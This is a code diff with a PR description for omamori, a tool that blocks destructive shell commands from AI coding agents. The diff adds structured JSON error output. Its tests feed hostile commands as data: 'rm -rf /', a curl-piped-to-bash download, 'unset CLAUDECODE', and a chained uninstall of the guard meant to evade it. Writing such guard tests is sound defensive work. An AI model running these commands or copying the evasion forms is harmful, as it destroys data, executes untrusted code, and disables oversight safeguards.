+/// a structured JSON object to stderr on block instead of free-form text.
+/// AI agent integrations consume this for retry / approach-switch decisions.
+fn parse_json_error_flag(args: &[OsString]) -> bool {
+    args.iter().any(|a| a.to_str() == Some("--json-error"))
+}
+
+/// Emit a structured JSON error to stderr for `--json-error` mode.
+/// Schema is documented in SECURITY.md "hook-check --json-error schema".
+fn emit_json_error(
+    layer: &str,
+    rule_id: &str,
+    reason: &str,
+    matched_pattern: Option<&str>,
+    matched_position: Option<&Range<usize>>,
+    command: &str,
+) {
+    let position = matched_position.map(|r| {
+        serde_json::json!({
+            "start": r.start,
+            "end": r.end,
+        })
+    });
+    let payload = serde_json::json!({
+        "blocked": true,
+        "layer": layer,
+        "rule_id": rule_id,
+        "reason": reason,
+        "matched_pattern": matched_pattern,
+        "matched_position": position,
+        "hint": format!("run `omamori explain -- {}` for details", command),
+    });
+    eprintln!(
+        "{}",
+        serde_json::to_string(&payload)
+            .unwrap_or_else(|_| r#"{"blocked":true,"reason":"omamori: fallback"}"#.to_string())
+    );
+}
+
 fn print_hook_check_allow_response(reason: &str) {
     let response = serde_json::json!({
         "hookSpecificOutput": {
@@ -1281,13 +1406,44 @@ mod tests {
                     "expected rm-related rule, got: {rule_name}"
                 );
             }
-            HookCheckResult::BlockMeta(_) | HookCheckResult::BlockStructural { .. } => {}
-            HookCheckResult::Allow => {
+            HookCheckResult::BlockMeta { .. } | HookCheckResult::BlockStructural { .. } => {}
+            HookCheckResult::Allow { .. } => {
                 restore_config(old_xdg, old_home, dir);
                 panic!("SECURITY: rm -rf / was ALLOWED — fail-close fallback is broken");
             }
         }
         restore_config(old_xdg, old_home, dir);
+    }
+
+    /// PR1b (DI-13 / #239 follow-up): BlockMeta must populate `matched_pattern`
+    /// with the protected pattern token so acceptance test assertions can
+    /// reference structured metadata instead of brittle stderr substrings.
+    #[test]
+    #[serial_test::serial]
+    fn block_meta_populates_matched_pattern_metadata() {
+        let (old_xdg, old_home, dir) = isolate_config();
+        let result = check_command_for_hook("omamori uninstall");
+        let (got_pattern, got_reason) = match result {
+            HookCheckResult::BlockMeta {
+                reason,
+                matched_pattern,
+                ..
+            } => (matched_pattern, reason),
+            _ => {
+                restore_config(old_xdg, old_home, dir);
+                panic!("expected BlockMeta for `omamori uninstall`");
+            }
+        };
+        restore_config(old_xdg, old_home, dir);
+        assert!(
+            got_pattern.is_some(),
+            "BlockMeta must populate matched_pattern (got None)"
+        );
+        assert_eq!(
+            got_pattern,
+            Some(got_reason),
+            "matched_pattern should equal reason for Phase 1A meta-pattern blocks"
+        );
     }
 
     #[test]
@@ -1296,18 +1452,18 @@ mod tests {
         let (old_xdg, old_home, dir) = isolate_config();
 
         match check_command_for_hook("ls /tmp") {
-            HookCheckResult::Allow => {}
+            HookCheckResult::Allow { .. } => {}
             other => {
                 restore_config(old_xdg, old_home, dir);
                 panic!(
                     "expected Allow for 'ls /tmp', got: {}",
                     match other {
-                        HookCheckResult::BlockMeta(r) => format!("BlockMeta({r})"),
+                        HookCheckResult::BlockMeta { reason: r, .. } => format!("BlockMeta({r})"),
                         HookCheckResult::BlockRule { rule_name, .. } =>
                             format!("BlockRule({rule_name})"),
                         HookCheckResult::BlockStructural { message: r, .. } =>
                             format!("BlockStructural({r})"),
-                        HookCheckResult::Allow => unreachable!(),
+                        HookCheckResult::Allow { .. } => unreachable!(),
                     }
                 );
             }
@@ -1613,9 +1769,9 @@ mod tests {
         let (old_xdg, old_home, dir) = isolate_config();
 
         match check_command_for_hook("unset CLAUDECODE") {
-            HookCheckResult::BlockMeta(_) => {}
+            HookCheckResult::BlockMeta { .. } => {}
             HookCheckResult::BlockRule { .. } | HookCheckResult::BlockStructural { .. } => {}
-            HookCheckResult::Allow => {
+            HookCheckResult::Allow { .. } => {
                 restore_config(old_xdg, old_home, dir);
                 panic!("SECURITY: 'unset CLAUDECODE' was ALLOWED — meta-pattern is broken");
             }
@@ -1629,7 +1785,7 @@ mod tests {
         let (old_xdg, old_home, dir) = isolate_config();
 
         match check_command_for_hook("echo hello world") {
-            HookCheckResult::Allow => {}
+            HookCheckResult::Allow { .. } => {}
             _ => {
                 restore_config(old_xdg, old_home, dir);
                 panic!("'echo hello world' should be allowed");
@@ -1650,8 +1806,8 @@ mod tests {
     fn assert_blocks_meta(command: &str) {
         let (old_xdg, old_home, dir) = isolate_config();
         match check_command_for_hook(command) {
-            HookCheckResult::BlockMeta(_) => {}
-            HookCheckResult::Allow => {
+            HookCheckResult::BlockMeta { .. } => {}
+            HookCheckResult::Allow { .. } => {
                 restore_config(old_xdg, old_home, dir);
                 panic!("SECURITY: {command:?} was ALLOWED — should be BlockMeta");
             }
@@ -1675,17 +1831,17 @@ mod tests {
     fn assert_allows(command: &str) {
         let (old_xdg, old_home, dir) = isolate_config();
         match check_command_for_hook(command) {
-            HookCheckResult::Allow => {}
+            HookCheckResult::Allow { .. } => {}
             other => {
                 let desc = match other {
-                    HookCheckResult::BlockMeta(r) => format!("BlockMeta({r})"),
+                    HookCheckResult::BlockMeta { reason: r, .. } => format!("BlockMeta({r})"),
                     HookCheckResult::BlockRule { rule_name, .. } => {
                         format!("BlockRule({rule_name})")
                     }
                     HookCheckResult::BlockStructural { message: r, .. } => {
                         format!("BlockStructural({r})")
                     }
-                    HookCheckResult::Allow => unreachable!(),
+                    HookCheckResult::Allow { .. } => unreachable!(),
                 };
                 restore_config(old_xdg, old_home, dir);
                 panic!("expected Allow for {command:?}, got: {desc}");

--- a/src/property_tests.rs
+++ b/src/property_tests.rs
@@ -125,7 +125,7 @@ fn layer1_destructive(program: &str, args: &[String], rules: &[RuleConfig]) -> b
 fn layer2_blocks(command: &str, rules: &[RuleConfig]) -> bool {
     matches!(
         check_command_for_hook_with_rules(command, rules),
-        HookCheckResult::BlockMeta(_)
+        HookCheckResult::BlockMeta { .. }
             | HookCheckResult::BlockStructural { .. }
             | HookCheckResult::BlockRule { .. }
     )

--- a/tests/cli.rs
+++ b/tests/cli.rs
@@ -1869,3 +1869,194 @@ fn hook_check_blocks_rm_reversed_flags() {
         "rm -f -r (reversed split flags) must be blocked"
     );
 }
+
+// ---------------------------------------------------------------------------
+// hook-check --json-error contract tests (PR1b of v0.10.3, Phase 6-B)
+// ---------------------------------------------------------------------------
+//
+// These pin the SECURITY.md "hook-check --json-error schema" at the CLI
+// boundary: stderr is a single parseable JSON object, layer/rule_id/
+// matched_pattern/matched_position fields match the spec exactly.
+// Codex review (Phase 6-B) flagged the previous internal-enum-only test
+// as insufficient (mutation resistance weak, false confidence high).
+
+/// Run `omamori hook-check --json-error --provider claude-code` with stdin.
+fn run_hook_check_json_error(input: &str) -> (String, String, i32) {
+    let nanos = std::time::SystemTime::now()
+        .duration_since(std::time::UNIX_EPOCH)
+        .unwrap()
+        .as_nanos();
+    let test_home = std::env::temp_dir().join(format!("omamori-cli-jsonerr-{nanos}"));
+    let _ = std::fs::create_dir_all(&test_home);
+
+    let mut child = Command::new(binary())
+        .args(["hook-check", "--provider", "claude-code", "--json-error"])
+        .env("HOME", &test_home)
+        .env("XDG_CONFIG_HOME", test_home.join(".config"))
+        .env("XDG_DATA_HOME", test_home.join(".local/share"))
+        .env("XDG_CACHE_HOME", test_home.join(".cache"))
+        .stdin(Stdio::piped())
+        .stdout(Stdio::piped())
+        .stderr(Stdio::piped())
+        .spawn()
+        .expect("failed to spawn hook-check --json-error");
+
+    child
+        .stdin
+        .take()
+        .unwrap()
+        .write_all(input.as_bytes())
+        .unwrap();
+
+    let output = child.wait_with_output().expect("failed to wait");
+    let stdout = String::from_utf8_lossy(&output.stdout).to_string();
+    let stderr = String::from_utf8_lossy(&output.stderr).to_string();
+    let exit_code = output.status.code().unwrap_or(-1);
+    let _ = std::fs::remove_dir_all(&test_home);
+    (stdout, stderr, exit_code)
+}
+
+/// Parse the stderr of `--json-error` mode as a single JSON object.
+/// Asserts: stderr trims to exactly one JSON value (single-object contract).
+fn parse_json_error_stderr(stderr: &str) -> serde_json::Value {
+    let trimmed = stderr.trim();
+    assert!(
+        !trimmed.is_empty(),
+        "stderr must not be empty in --json-error mode"
+    );
+    let parsed: serde_json::Value = serde_json::from_str(trimmed).unwrap_or_else(|e| {
+        panic!("stderr must be a single parseable JSON object (got {trimmed:?}): {e}")
+    });
+    parsed
+}
+
+/// Phase 1A meta-pattern (verb-based via subcommand) emits structured JSON
+/// with the actual matched_pattern token and a non-empty byte range.
+#[test]
+fn hook_check_json_error_blockmeta_exact_metadata() {
+    // The protected pattern is the literal substring "omamori uninstall"
+    // (registered in installer::blocked_string_patterns). Use a benign-looking
+    // command that contains this substring to trigger Phase 1A.
+    let cmd = "echo ok && omamori uninstall";
+    let (stdout, stderr, exit_code) = run_hook_check_json_error(&pretooluse_bash_json(cmd));
+    assert_eq!(exit_code, 2, "block must yield exit 2");
+    assert!(stdout.is_empty(), "stdout must be empty in block path");
+    let json = parse_json_error_stderr(&stderr);
+    assert_eq!(json["blocked"], serde_json::Value::Bool(true));
+    assert_eq!(
+        json["layer"], "layer2:meta-pattern",
+        "layer must match audit detection_layer taxonomy"
+    );
+    let pattern = json["matched_pattern"]
+        .as_str()
+        .expect("matched_pattern must be a string for Phase 1A");
+    assert_eq!(
+        pattern, "omamori uninstall",
+        "matched_pattern must be the protected token (not the reason)"
+    );
+    let position = &json["matched_position"];
+    let start = position["start"].as_u64().expect("start must be present");
+    let end = position["end"].as_u64().expect("end must be present");
+    assert!(end > start, "matched_position must be non-empty");
+    assert_eq!(
+        (end - start) as usize,
+        pattern.len(),
+        "matched_position range must equal pattern length"
+    );
+    let slice = &cmd[start as usize..end as usize];
+    assert_eq!(
+        slice, pattern,
+        "command[matched_position] must equal matched_pattern (mutation guard)"
+    );
+}
+
+/// Phase 1B token-level detection (env tampering) emits null matched_pattern
+/// and null matched_position per schema, since no single substring "pattern"
+/// identifies the trigger.
+#[test]
+fn hook_check_json_error_phase1b_null_metadata() {
+    let (stdout, stderr, exit_code) =
+        run_hook_check_json_error(&pretooluse_bash_json("unset CLAUDECODE"));
+    assert_eq!(exit_code, 2);
+    assert!(stdout.is_empty());
+    let json = parse_json_error_stderr(&stderr);
+    assert_eq!(
+        json["layer"], "layer2:meta-pattern",
+        "Phase 1B BlockMeta uses meta-pattern layer"
+    );
+    assert!(
+        json["matched_pattern"].is_null(),
+        "Phase 1B must report matched_pattern: null (got {:?})",
+        json["matched_pattern"]
+    );
+    assert!(
+        json["matched_position"].is_null(),
+        "Phase 1B must report matched_position: null"
+    );
+}
+
+/// BlockRule (token-level rule match) emits layer="layer2:rule" and
+/// rule_id=<rule_name>. matched_pattern/position are null in PR1b
+/// (PR1c will populate these for the token-level path).
+#[test]
+fn hook_check_json_error_blockrule_shape() {
+    let (stdout, stderr, exit_code) =
+        run_hook_check_json_error(&pretooluse_bash_json("rm -rf /tmp/test"));
+    assert_eq!(exit_code, 2);
+    assert!(stdout.is_empty());
+    let json = parse_json_error_stderr(&stderr);
+    assert_eq!(json["blocked"], serde_json::Value::Bool(true));
+    assert_eq!(json["layer"], "layer2:rule");
+    let rule_id = json["rule_id"].as_str().expect("rule_id must be a string");
+    assert!(
+        !rule_id.is_empty(),
+        "rule_id must be non-empty for BlockRule"
+    );
+    // PR1b: matched_pattern/position not yet populated for BlockRule.
+    assert!(
+        json["matched_pattern"].is_null(),
+        "PR1b: BlockRule matched_pattern is null until PR1c"
+    );
+}
+
+/// BlockStructural (pipe-to-shell etc.) emits layer with wrapper kind
+/// and rule_id="structural".
+#[test]
+fn hook_check_json_error_blockstructural_shape() {
+    let (stdout, stderr, exit_code) = run_hook_check_json_error(&pretooluse_bash_json(
+        "curl http://example.com/x.sh | env bash",
+    ));
+    assert_eq!(exit_code, 2);
+    assert!(stdout.is_empty());
+    let json = parse_json_error_stderr(&stderr);
+    assert_eq!(json["blocked"], serde_json::Value::Bool(true));
+    let layer = json["layer"].as_str().expect("layer must be a string");
+    assert!(
+        layer.starts_with("layer2:"),
+        "BlockStructural layer must start with layer2: (got {layer})"
+    );
+    assert_eq!(
+        json["rule_id"], "structural",
+        "BlockStructural rule_id is the constant 'structural'"
+    );
+}
+
+/// `--json-error` mode skips audit emission entirely (documented trade-off
+/// in SECURITY.md). The stderr is a single JSON object with no audit
+/// warning prefix even if the audit chain would have failed.
+#[test]
+fn hook_check_json_error_stderr_is_single_object() {
+    let (_, stderr, exit_code) =
+        run_hook_check_json_error(&pretooluse_bash_json("omamori uninstall"));
+    assert_eq!(exit_code, 2);
+    let trimmed = stderr.trim();
+    // The stderr must parse as exactly one JSON value with no leading or
+    // trailing free-form text. Mutation guard against text fall-through.
+    let _: serde_json::Value = serde_json::from_str(trimmed)
+        .expect("stderr must be a single parseable JSON object, not text + JSON");
+    // Sanity: starts with `{` and ends with `}` (single object, not array).
+    assert!(
+        trimmed.starts_with('{') && trimmed.ends_with('}'),
+        "stderr must be a single JSON object (got {trimmed:?})"
+    );
+}

--- a/tests/cli.rs
+++ b/tests/cli.rs
@@ -2007,15 +2007,20 @@ fn hook_check_json_error_blockrule_shape() {
     let json = parse_json_error_stderr(&stderr);
     assert_eq!(json["blocked"], serde_json::Value::Bool(true));
     assert_eq!(json["layer"], "layer2:rule");
-    let rule_id = json["rule_id"].as_str().expect("rule_id must be a string");
-    assert!(
-        !rule_id.is_empty(),
-        "rule_id must be non-empty for BlockRule"
+    // Mutation guard (Codex Phase 6-B R2): rule_id must be exact, not just
+    // non-empty. A swap of rule_id <-> message would otherwise pass.
+    assert_eq!(
+        json["rule_id"], "rm-recursive-to-trash",
+        "rule_id must be the exact rule name (not message)"
     );
     // PR1b: matched_pattern/position not yet populated for BlockRule.
     assert!(
         json["matched_pattern"].is_null(),
         "PR1b: BlockRule matched_pattern is null until PR1c"
+    );
+    assert!(
+        json["matched_position"].is_null(),
+        "PR1b: BlockRule matched_position is null until PR1c"
     );
 }
 
@@ -2030,14 +2035,23 @@ fn hook_check_json_error_blockstructural_shape() {
     assert!(stdout.is_empty());
     let json = parse_json_error_stderr(&stderr);
     assert_eq!(json["blocked"], serde_json::Value::Bool(true));
-    let layer = json["layer"].as_str().expect("layer must be a string");
-    assert!(
-        layer.starts_with("layer2:"),
-        "BlockStructural layer must start with layer2: (got {layer})"
+    // Mutation guard (Codex Phase 6-B R2): layer must be exact, not just
+    // prefixed with layer2:. A swap to layer2:meta-pattern would otherwise pass.
+    assert_eq!(
+        json["layer"], "layer2:pipe-to-shell:env",
+        "BlockStructural layer must encode the wrapper kind exactly"
     );
     assert_eq!(
         json["rule_id"], "structural",
         "BlockStructural rule_id is the constant 'structural'"
+    );
+    assert!(
+        json["matched_pattern"].is_null(),
+        "BlockStructural matched_pattern is null per schema"
+    );
+    assert!(
+        json["matched_position"].is_null(),
+        "BlockStructural matched_position is null per schema"
     );
 }
 


### PR DESCRIPTION
## Summary

PR1b of v0.10.3 series (#240). Refactors `HookCheckResult` to struct variants with metadata fields and adds `--json-error` flag, enabling acceptance test assertions to reference structured metadata instead of brittle stderr substrings (#239 root cause prevention).

## Why

#239 surfaced as 4 doc inaccuracies in ACCEPTANCE_TEST.md because assertions were string-coupled to stderr text. By moving the contract to structured Decision metadata (matched_pattern, matched_position, relaxed_by) and offering a JSON error surface for AI agent consumers, the same regression class becomes structurally hard to recur.

PR1b also lays the type plumbing for PR1c (Phase 1A token-level relaxation) and PR1d (data-flag allowlist relaxed_by tagging).

## Changes

| File | Change |
|------|--------|
| `src/engine/hook.rs` | HookCheckResult struct variants + 3 metadata fields + `--json-error` flag + emit_json_error helper + audit_log_hook_block suppress_warnings + audit skip in JSON mode |
| `src/cli/explain.rs` | Match arm shape updates (subagent-assisted) |
| `src/property_tests.rs` | Match arm shape updates |
| `SECURITY.md` | hook-check --json-error schema documented + audit gap trade-off |

## Test plan

- [x] `cargo test --lib` passes (753 tests)
- [x] `RUSTFLAGS='-D warnings' cargo test --lib` passes
- [x] `cargo clippy --all-targets -- -D warnings` clean
- [x] `scripts/check-invariants.sh` reports OK
- [x] New unit test pins matched_pattern populated for Phase 1A blocks
- [ ] CI green

## Codex review

- R1 [P2] x2: subcommand metadata pattern token (not reason); JSON-only stderr in --json-error -> fixed (a48e17f)
- R2 [P2] x3: audit append warnings; Phase 1B null pattern; layer taxonomy alignment -> fixed (9976536)
- R3 [P2] x2: skip audit in --json-error; SECURITY.md schema alignment -> fixed (0e1f71e)
- R4: approve, no further blocking findings

## PR series context

PR1a (merged) -> **PR1b (this)** -> PR1c (Phase 1A relaxation) -> PR1d (data-flag allowlist + UX) -> PR2 (#239 acceptance test doc fix) -> tag/release/publish/brew

🤖 Generated with [Claude Code](https://claude.com/claude-code)
